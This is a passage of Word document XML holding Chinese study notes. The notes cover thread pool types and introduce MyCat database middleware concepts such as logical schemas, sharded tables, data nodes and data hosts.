          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>线程上，将连接断开事件放入队列，有序逐个执行，其它消息派发到线程池。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>ThreadPool</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t xml:space="preserve">fixed </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>固定大小线程池，启动时建立线程，不关闭，一直持有。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>缺省</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t xml:space="preserve">cached </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>缓存线程池，空闲一分钟自动删除，需要时重建。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">limited </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>可伸缩线程池，但池中的线程数只会增长不会收缩。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>为避免收缩时突然来了大流量引起的性能问题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB030F" w:rsidRPr="00F41A4C" w:rsidRDefault="00DB030F" w:rsidP="00DB030F">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">9 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MyCat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE0D91" w:rsidRPr="00CE0D91" w:rsidRDefault="008B4EE5" w:rsidP="00CE0D91">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00CE0D91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidR="00CE0D91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00CE0D91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">1 </w:t>
      </w:r>
      <w:r w:rsidR="00CE0D91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>概念</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00537D8C" w:rsidRDefault="00CE0D91" w:rsidP="008B4EE5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="008B4EE5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Mycat</w:t>
      </w:r>
      <w:r w:rsidR="008B4EE5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是数据库中间件，介于数据库与应用之间，进行数据处理与交互的中间服务。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>读写分离</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00675576" w:rsidRPr="00CE0D91" w:rsidRDefault="00675576" w:rsidP="008B4EE5">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE0D91">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE0D91">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据切分分为垂直切分</w:t>
      </w:r>
      <w:r w:rsidR="00601F1F" w:rsidRPr="00CE0D91">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00601F1F" w:rsidRPr="00CE0D91">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>业务</w:t>
      </w:r>
      <w:r w:rsidR="00601F1F" w:rsidRPr="00CE0D91">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE0D91">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和水平切分</w:t>
      </w:r>
      <w:r w:rsidR="00601F1F" w:rsidRPr="00CE0D91">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00601F1F" w:rsidRPr="00CE0D91">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表</w:t>
      </w:r>
      <w:r w:rsidR="00601F1F" w:rsidRPr="00CE0D91">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B4EE5" w:rsidRPr="00675576" w:rsidRDefault="00675576" w:rsidP="008B4EE5">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="008B4EE5" w:rsidRPr="00675576">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>逻辑库</w:t>
      </w:r>
      <w:r w:rsidR="008B4EE5" w:rsidRPr="00675576">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(Scheme):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B4EE5" w:rsidRPr="00675576" w:rsidRDefault="008B4EE5" w:rsidP="008B4EE5">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00675576">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00675576">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>逻辑表</w:t>
      </w:r>
      <w:r w:rsidRPr="00675576">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00675576">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>既然有逻辑库，那么就会有逻辑表</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B4EE5" w:rsidRPr="00675576" w:rsidRDefault="008B4EE5" w:rsidP="008B4EE5">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00675576">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00675576">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分片表</w:t>
      </w:r>
      <w:r w:rsidRPr="00675576">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(table)</w:t>
      </w:r>
      <w:r w:rsidRPr="00675576">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00675576">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;table name="t_node" primaryKey="vid" autoIncrement="true" dataNode="dn1,dn2" rule="rule1" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B4EE5" w:rsidRPr="00675576" w:rsidRDefault="008B4EE5" w:rsidP="008B4EE5">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00675576">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00675576">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分片节点</w:t>
      </w:r>
      <w:r w:rsidRPr="00675576">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(dataNode)</w:t>
      </w:r>
      <w:r w:rsidRPr="00675576">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：数据切分后，一个大表被分到不同的分片数据库上面，每个表分片所在的数据库就是分片节点。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B4EE5" w:rsidRDefault="008B4EE5" w:rsidP="008B4EE5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00675576">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00675576">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>节点主机</w:t>
      </w:r>
      <w:r w:rsidRPr="00675576">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(dataHost):</w:t>
      </w:r>
      <w:r w:rsidRPr="00675576">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>每个分片节点不一定会独占一台机器，同一机器上面可以有多个分片数据库，这样一个或多个分片节点</w:t>
      </w:r>
      <w:r w:rsidRPr="00675576">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(dataNode)</w:t>
      </w:r>
      <w:r w:rsidRPr="00675576">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所在的机器就是节点主机</w:t>
      </w:r>
      <w:r w:rsidRPr="00675576">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(dataHost)</w:t>
      </w:r>
      <w:r w:rsidRPr="00675576">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，为了规避单节点主机主机并发数限制，尽量将读写压力高的分配节点均衡放在不同的主机</w:t>
      </w:r>
      <w:r w:rsidRPr="00675576">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(dataHost)</w:t>
      </w:r>
      <w:r w:rsidRPr="00675576">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB21B1" w:rsidRPr="00675576" w:rsidRDefault="00CB21B1" w:rsidP="008B4EE5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008B4EE5" w:rsidRDefault="008B4EE5" w:rsidP="008B4EE5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4832528" cy="3174797"/>
            <wp:effectExtent l="19050" t="0" r="6172" b="0"/>
            <wp:docPr id="28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9" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4832528" cy="3174797"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB21B1" w:rsidRDefault="00CB21B1" w:rsidP="008B4EE5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CB21B1" w:rsidRPr="00CE0D91" w:rsidRDefault="00CB21B1" w:rsidP="00CB21B1">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>什么是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MyCat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB21B1" w:rsidRDefault="00EB102E" w:rsidP="008B4EE5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
        <w:t>Mycat</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB102E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>实现了</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB102E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Mysql</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB102E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>协议的</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB102E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00A51DE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>前端</w:t>
      </w:r>
      <w:r w:rsidR="00E10551" w:rsidRPr="00A51DE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>连接</w:t>
      </w:r>
      <w:r w:rsidRPr="00A51DE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
